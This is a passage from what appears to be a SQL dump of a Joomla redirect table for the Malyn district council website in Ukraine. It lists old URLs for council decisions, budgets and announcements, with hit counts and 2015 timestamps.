00:00:00',301),(19398,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=664:-------------l-r-lr&catid=41:--27042012-&Itemid=78&lang=en','','','',1,0,'2015-11-23 04:09:16','0000-00-00 00:00:00',301),(19399,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=37:--21102011-&layout=blog&Itemid=72&lang=en&limitstart=20','','','',2,0,'2015-11-23 04:27:53','0000-00-00 00:00:00',301),(19400,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/985-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya','','','',6,0,'2015-11-23 04:28:44','0000-00-00 00:00:00',301),(19401,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=332:-5-&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-11-23 04:31:04','0000-00-00 00:00:00',301),(19402,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15&lang=uk','','','',2,0,'2015-11-23 04:37:25','0000-00-00 00:00:00',301),(19403,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=5','','','',12,0,'2015-11-23 04:37:28','0000-00-00 00:00:00',301),(19404,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39&layout=blog&Itemid=76&lang=ru&limitstart=20','','','',2,0,'2015-11-23 04:41:33','0000-00-00 00:00:00',301),(19405,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=en&limitstart=10','','','',2,0,'2015-11-23 04:42:00','0000-00-00 00:00:00',301),(19406,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39:-22022012-&layout=blog&Itemid=76&lang=ru&limitstart=15','','','',2,0,'2015-11-23 04:45:39','0000-00-00 00:00:00',301),(19407,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/356-pro-zatverdzhennja-programi-rozvitku-malogo-i','','','',11,0,'2015-11-23 04:47:01','0000-00-00 00:00:00',301),(19408,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=797:-6-16112010-5-&catid=45&Itemid=84&lang=en','','','',4,0,'2015-11-23 04:52:02','0000-00-00 00:00:00',301),(19409,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=710:2012-06-14-15-07-29&catid=43&Itemid=82&lang=ru','','','',15,0,'2015-11-23 04:54:19','0000-00-00 00:00:00',301),(19410,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-----------------2007-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2015-11-23 04:57:30','0000-00-00 00:00:00',301),(19411,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=600:2012-03-01-06-12-24&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-11-23 04:58:25','0000-00-00 00:00:00',301),(19412,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=677:------------2012-2015-&catid=42&Itemid=80&lang=en','','','',3,0,'2015-11-23 04:59:19','0000-00-00 00:00:00',301),(19413,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=875:-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2015-11-23 04:59:47','0000-00-00 00:00:00',301),(19414,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/348-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_8','','','',27,0,'2015-11-23 05:11:13','0000-00-00 00:00:00',301),(19415,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=850:-2013-&catid=46&Itemid=85&lang=ru','','','',3,0,'2015-11-23 05:17:33','0000-00-00 00:00:00',301),(19416,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=651:-2012-&catid=42&Itemid=80&lang=en','','','',2,0,'2015-11-23 05:19:23','0000-00-00 00:00:00',301),(19417,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=541:2012-01-26-11-55-32&catid=36&Itemid=70&lang=ru','','','',3,0,'2015-11-23 05:19:50','0000-00-00 00:00:00',301),(19418,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=407:-l-r-2010-2015-&catid=37&Itemid=72&lang=ru','','','',3,0,'2015-11-23 05:20:44','0000-00-00 00:00:00',301),(19419,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=670:2012-05-08-05-15-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2015-11-23 05:22:36','0000-00-00 00:00:00',301),(19420,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=677:------------2012-2015-&catid=42:--16052012-&Itemid=80&lang=en','','','',1,0,'2015-11-23 05:23:58','0000-00-00 00:00:00',301),(19421,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=416:2011-09-29-06-48-53&catid=37&Itemid=72&lang=en','','','',2,0,'2015-11-23 05:24:23','0000-00-00 00:00:00',301),(19422,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=481:--------2012-2015--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-11-23 05:25:18','0000-00-00 00:00:00',301),(19423,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=439:2011-10-21-16-22-19&catid=37&Itemid=72&lang=en','','','',1,0,'2015-11-23 05:28:29','0000-00-00 00:00:00',301),(19426,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-?start=14','','','',40,0,'2015-11-23 05:36:41','0000-00-00 00:00:00',301),(19427,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=676:2012-05-17-09-52-12&catid=42&Itemid=80&lang=en','','','',3,0,'2015-11-23 05:42:10','0000-00-00 00:00:00',301),(19428,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=3&lang=en&limitstart=5','','','',4,0,'2015-11-23 05:42:37','0000-00-00 00:00:00',301),(19429,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=ru&limitstart=15','','','',1,0,'2015-11-23 06:09:30','0000-00-00 00:00:00',301),(19430,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/381-pro-peredachu-neruhomogo-majna-shho-perebuvae-u_2','','','',7,0,'2015-11-23 06:10:24','0000-00-00 00:00:00',301),(19431,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=784:-9-&catid=11&lang=uk&Itemid=','','','',5,0,'2015-11-23 06:14:57','0000-00-00 00:00:00',301),(19432,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=546:--------l---r----&catid=36&Itemid=70&lang=en','','','',5,0,'2015-11-23 06:24:13','0000-00-00 00:00:00',301),(19433,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=600:2012-03-01-06-12-24&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2015-11-23 06:25:08','0000-00-00 00:00:00',301),(19434,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=328:2011-05-20-16-23-02&catid=33&Itemid=66&lang=uk','','','',4,0,'2015-11-23 06:33:21','0000-00-00 00:00:00',301),(19435,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2015-11-23 06:36:42','0000-00-00 00:00:00',301),(19436,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=582:2012-02-27-13-18-37&catid=40&Itemid=77&lang=uk','','','',8,0,'2015-11-23 06:43:07','0000-00-00 00:00:00',301),(19437,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=742:-14-&catid=11&lang=ru&Itemid=','','','',4,0,'2015-11-23 06:43:59','0000-00-00 00:00:00',301),(19438,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=uk&start=21','','','',2,0,'2015-11-23 06:46:39','0000-00-00 00:00:00',301),(19439,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=55&layout=blog&Itemid=96&lang=uk','','','',2,0,'2015-11-23 06:49:33','0000-00-00 00:00:00',301),(19440,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?limitstart=0','','','',9,0,'2015-11-23 06:53:57','0000-00-00 00:00:00',301),(19441,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=58&Itemid=105&lang=uk','','','',2,0,'2015-11-23 06:54:34','0000-00-00 00:00:00',301),(19442,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11&lang=en','','','',9,0,'2015-11-23 06:54:37','0000-00-00 00:00:00',301),(19443,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-11-23 06:55:02','0000-00-00 00:00:00',301),(19444,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=32&layout=blog&Itemid=64&lang=uk','','','',3,0,'2015-11-23 06:57:06','0000-00-00 00:00:00',301),(19445,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=ru&limitstart=20','','','',3,0,'2015-11-23 07:00:07','0000-00-00 00:00:00',301),(19446,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=600:2012-03-01-06-12-24&catid=11&lang=en&Itemid=','','','',2,0,'2015-11-23 07:00:22','0000-00-00 00:00:00',301),(19447,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=uk&limitstart=15','','','',1,0,'2015-11-23 07:06:20','0000-00-00 00:00:00',301),(19448,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=58&layout=blog&Itemid=105&lang=uk','','','',1,0,'2015-11-23 07:08:29','0000-00-00 00:00:00',301),(19449,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=472:-l-r-&catid=38&Itemid=73&lang=en','','','',2,0,'2015-11-23 07:08:51','0000-00-00 00:00:00',301),(19450,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=55&Itemid=96&lang=uk','','','',1,0,'2015-11-23 07:13:45','0000-00-00 00:00:00',301),(19451,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43:--25072012-&layout=blog&Itemid=82&lang=uk&limitstart=25','','','',1,0,'2015-11-23 07:34:22','0000-00-00 00:00:00',301),(19452,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=430:14-&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-11-23 07:59:53','0000-00-00 00:00:00',301),(19453,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=6:2010-06-05-14-26-47&catid=6:2010-06-05-12-52-17&Itemid=9&lang=en','','','',5,0,'2015-11-23 08:09:00','0000-00-00 00:00:00',301),(19454,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11&lang=en&Itemid=','','','',5,0,'2015-11-23 08:10:49','0000-00-00 00:00:00',301),(19455,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=523:2011-12-30-10-16-28&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2015-11-23 08:42:51','0000-00-00 00:00:00',301),(19456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2015-11-23 09:33:31','0000-00-00 00:00:00',301),(19457,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&Itemid=86&lang=en','','','',6,0,'2015-11-23 09:33:34','0000-00-00 00:00:00',301),(19458,'http://malyn-rayrada.org.ua/index.php/1136-pishov-z-zhittya-mikola-demskij','','','',6,0,'2015-11-23 09:33:54','0000-00-00 00:00:00',301),(19459,'http://malyn-rayrada.org.ua/index.php/1136-pishov-z-zhittya-mikola-demskij?tmpl=component&print=1&layout=default&page=','','','',36,0,'2015-11-23 09:33:57','0000-00-00 00:00:00',301),(19460,'http://malyn-rayrada.org.ua/index.php/1137-zustrich-iz-predstavnikami-teritorialnikh-gromad?tmpl=component&print=1&layout=default&page=','','','',37,0,'2015-11-23 09:33:58','0000-00-00 00:00:00',301),(19461,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&catid=11&lang=uk','','','',3,0,'2015-11-23 09:34:25','0000-00-00 00:00:00',301),(19462,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&catid=11&lang=uk','','','',3,0,'2015-11-23 09:34:30','0000-00-00 00:00:00',301),(19463,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=54&Itemid=95&lang=ru&limitstart=5','','','',2,0,'2015-11-23 09:34:33','0000-00-00 00:00:00',301),(19464,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=uk&limitstart=15','','','',2,0,'2015-11-23 09:34:34','0000-00-00 00:00:00',301),(19465,'http://malyn-rayrada.org.ua/index.php/48-zustrich-iz-vchiteljami','','','',4,0,'2015-11-23 09:34:50','0000-00-00 00:00:00',301),(19466,'http://malyn-rayrada.org.ua/index.php/558-27-sesija-rajonnoi-radi-vidbudetsja-4-ljutogo-2014','','','',5,0,'2015-11-23 09:34:59','0000-00-00 00:00:00',301),(19467,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=en&limitstart=25','','','',2,0,'2015-11-23 09:35:00','0000-00-00 00:00:00',301),(19468,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=en&limitstart=20','','','',2,0,'2015-11-23 09:35:00','0000-00-00 00:00:00',301),(19469,'http://malyn-rayrada.org.ua/index.php/564-za-materialami-zvernen-po-medreformi','','','',5,0,'2015-11-23 09:35:03','0000-00-00 00:00:00',301),(19470,'http://malyn-rayrada.org.ua/index.php/564-za-materialami-zvernen-po-medreformi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 09:35:04','0000-00-00 00:00:00',301),(19471,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&Itemid=85&lang=en','','','',2,0,'2015-11-23 09:35:07','0000-00-00 00:00:00',301),(19472,'http://malyn-rayrada.org.ua/index.php/587-23-serpnja-v-ukraini-vidznachaetsja-den?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 09:35:18','0000-00-00 00:00:00',301),(19473,'http://malyn-rayrada.org.ua/index.php/592-vitaemo-iz-svjatom-pershogo-dzvonika_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-23 09:35:23','0000-00-00 00:00:00',301),(19474,'http://malyn-rayrada.org.ua/index.php/603-ogoloshennja-akcija-miloserdja','','','',9,0,'2015-11-23 09:35:24','0000-00-00 00:00:00',301),(19475,'http://malyn-rayrada.org.ua/index.php/625-cvjato-pokrovi-presvjatoi-bogorodici-u-vorsivci','','','',9,0,'2015-11-23 09:35:28','0000-00-00 00:00:00',301),(19476,'http://malyn-rayrada.org.ua/index.php/646-shhe-odin-krok-do-zavershennja-vporjadkuvannja','','','',9,0,'2015-11-23 09:35:41','0000-00-00 00:00:00',301),(19477,'http://malyn-rayrada.org.ua/index.php/647-9-listopada-den-ukrainskoi-pisemnosti-ta-movi','','','',4,0,'2015-11-23 09:35:43','0000-00-00 00:00:00',301),(19478,'http://malyn-rayrada.org.ua/index.php/647-9-listopada-den-ukrainskoi-pisemnosti-ta-movi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-23 09:35:46','0000-00-00 00:00:00',301),(19479,'http://malyn-rayrada.org.ua/index.php/728-ogoloshennja_13','','','',5,0,'2015-11-23 09:36:18','0000-00-00 00:00:00',301),(19480,'http://malyn-rayrada.org.ua/index.php/967-vidbulas-36-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 09:36:52','0000-00-00 00:00:00',301),(19481,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1087-pro-plan-roboti-rajonnoji-radi-na-ii-pivrichchya-2015-roku','','','',4,0,'2015-11-23 09:37:07','0000-00-00 00:00:00',301),(19482,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/515-pro-zatverdzhenja-aktu-prijomu-peredachi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 09:38:14','0000-00-00 00:00:00',301),(19483,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=642:2012-04-03-12-53-05&catid=32&Itemid=64&lang=ru','','','',3,0,'2015-11-23 09:38:47','0000-00-00 00:00:00',301),(19484,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=711:2012-06-14-15-09-26&Itemid=82&lang=ru','','','',2,0,'2015-11-23 09:38:50','0000-00-00 00:00:00',301),(19485,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/397-pro-skasuvannja-rishennja-rajonnoi-radi-vid-12?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 09:38:53','0000-00-00 00:00:00',301),(19486,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&lang=ru','','','',2,0,'2015-11-23 09:38:55','0000-00-00 00:00:00',301),(19487,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/399-pro-zatverdzhennja-zmin-do-strukturi-ta?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-23 09:38:58','0000-00-00 00:00:00',301),(19488,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-?start=21','','','',4,0,'2015-11-23 09:39:02','0000-00-00 00:00:00',301),(19489,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/98-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-23 09:39:45','0000-00-00 00:00:00',301),(19490,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?limitstart=0','','','',8,0,'2015-11-23 09:39:51','0000-00-00 00:00:00',301),(19491,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?start=14','','','',6,0,'2015-11-23 09:39:52','0000-00-00 00:00:00',301),(19492,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?start=7','','','',6,0,'2015-11-23 09:39:56','0000-00-00 00:00:00',301),(19493,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/296-pro-vnesennja-zmin-do-programi-socialno?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-23 09:40:03','0000-00-00 00:00:00',301),(19494,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/530-pro-nadannja-dozvolu-na-rozroblennja-detalnogo?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 09:40:09','0000-00-00 00:00:00',301),(19495,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/532-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp','','','',3,0,'2015-11-23 09:40:11','0000-00-00 00:00:00',301),(19496,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/534-pro-zvernennja-do-verhovnoi-radi-ukraini-shhodo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-23 09:40:17','0000-00-00 00:00:00',301),(19497,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/538-pro-vikonannja-planu-roboti-rajonnoi-radi-za-i_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-23 09:40:29','0000-00-00 00:00:00',301),(19498,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/541-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_12?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-23 09:40:32','0000-00-00 00:00:00',301),(19499,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/544-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-23 09:40:41','0000-00-00 00:00:00',301),(19500,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/555-pro-vikonannja-rajonnogo-bjudzhetu-za-pershe?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-23 09:40:53','0000-00-00 00:00:00',301),(19501,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/556-pro-pereobrannja-golovi-postijnoi-komisii-rajonnoi','','','',5,0,'2015-11-23 09:40:54','0000-00-00 00:00:00',301),(19502,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/571-pro-deputatskij-zapit-deputata-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-23 09:40:57','0000-00-00 00:00:00',301),(19503,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/572-pro-zatverdzhennja-proektu-zemleustroju-shhodo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-23 09:41:00','0000-00-00 00:00:00',301),(19504,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/573-pro-klopotannja-pered-departamentom-praci-ta?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-23 09:41:03','0000-00-00 00:00:00',301),(19505,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/574-pro-klopotannja-pered-zhitomirskoju-oblasnoju?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-23 09:41:07','0000-00-00 00:00:00',301),(19506,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/249-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 09:41:18','0000-00-00 00:00:00',301),(19507,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/140-pro-hid-vikonannja-rajonnoi-cilovoi-programi','','','',2,0,'2015-11-23 09:41:34','0000-00-00 00:00:00',301),(19508,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/140-pro-hid-vikonannja-rajonnoi-cilovoi-programi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 09:41:36','0000-00-00 00:00:00',301),(19509,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/182-pro-hid-vikonannja-programi-zabezpechennja?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 09:41:44','0000-00-00 00:00:00',301),(19510,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/70-pro-hid-vikonannja-rajonnoi-programi-vidpochinku?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 09:41:50','0000-00-00 00:00:00',301),(19511,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=59&Itemid=107&lang=en','','','',37,0,'2015-11-23 09:41:54','0000-00-00 00:00:00',301),(19512,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/88-pro-hid-vikonannja-rajonnoi-programi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 09:41:54','0000-00-00 00:00:00',301),(19513,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=uk&limitstart=10','','','',5,0,'2015-11-23 09:41:55','0000-00-00 00:00:00',301),(19514,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&Itemid=12&lang=ru','','','',2,0,'2015-11-23 09:41:57','0000-00-00 00:00:00',301),(19515,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&Itemid=17&lang=en','','','',2,0,'2015-11-23 09:41:57','0000-00-00 00:00:00',301),(19516,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=443:-2011-&Itemid=72&lang=ru','','','',3,0,'2015-11-23 09:41:59','0000-00-00 00:00:00',301),(19517,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/94-pro-hid-vikonannja-programi-pidtrimki-malogo?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 09:41:59','0000-00-00 00:00:00',301),(19518,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=4:-1062010&Itemid=8&lang=en','','','',2,0,'2015-11-23 09:42:02','0000-00-00 00:00:00',301),(19519,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/95-pro-hid-vikonannja-rajonnoi-socialnoi-programi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 09:42:03','0000-00-00 00:00:00',301),(19520,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/96-pro-hid-vikonannja-rajonnoi-programi-vidznachennja','','','',2,0,'2015-11-23 09:42:04','0000-00-00 00:00:00',301),(19521,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/324-pro-zatverdzhennja-rajonnoi-programi-shhodo?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 09:42:25','0000-00-00 00:00:00',301),(19522,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/402-pro-zatverdzhennja-rajonnogo-bjudzhetu-na-2013-rik?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 09:42:29','0000-00-00 00:00:00',301),(19523,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/443-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_6?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 09:42:44','0000-00-00 00:00:00',301),(19524,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/447-pro-viznachennja-statusu-muzeju-istorii?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 09:42:46','0000-00-00 00:00:00',301),(19525,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--23042013-/524-pro-zatverdzhennja-rezultativ-aukcionnih-torgiv-z_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 09:42:49','0000-00-00 00:00:00',301),(19526,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/329-pro-vnesennja-zmin-do-rajonnoi-programi-rozvitku_2','','','',3,0,'2015-11-23 09:42:51','0000-00-00 00:00:00',301),(19527,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/330-pro-vnesennja-zmin-do-rajonnoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-23 09:42:54','0000-00-00 00:00:00',301),(19528,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/331-pro-hid-vikonannja-rajonnoi-programi-budivnictva','','','',2,0,'2015-11-23 09:42:55','0000-00-00 00:00:00',301),(19529,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=315:2011-05-20-13-07-47&Itemid=66&lang=en','','','',4,0,'2015-11-23 09:43:58','0000-00-00 00:00:00',301),(19530,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=584:-20-2011-100-l-r-&catid=40&Itemid=77&lang=uk','','','',2,0,'2015-11-23 09:50:42','0000-00-00 00:00:00',301),(19531,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=587:2012-02-27-13-44-05&catid=40&Itemid=77&lang=uk','','','',7,0,'2015-11-23 09:50:42','0000-00-00 00:00:00',301),(19532,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=588:2012-02-27-13-48-51&catid=40&Itemid=77&lang=uk','','','',3,0,'2015-11-23 09:50:42','0000-00-00 00:00:00',301),(19533,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=591:2012-02-27-14-31-33&catid=40&Itemid=77&lang=uk','','','',2,0,'2015-11-23 09:50:43','0000-00-00 00:00:00',301),(19534,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=616:----l-r&catid=40&Itemid=77&lang=uk','','','',2,0,'2015-11-23 09:50:45','0000-00-00 00:00:00',301),(19535,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=632:-2011-2015-&catid=42&Itemid=80&lang=uk','','','',9,0,'2015-11-23 09:50:45','0000-00-00 00:00:00',301),(19536,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=643:-6-&catid=42:--16052012-&Itemid=80&lang=uk','','','',4,0,'2015-11-23 09:50:46','0000-00-00 00:00:00',301),(19537,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=671:2012-05-09-13-09-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2015-11-23 09:50:47','0000-00-00 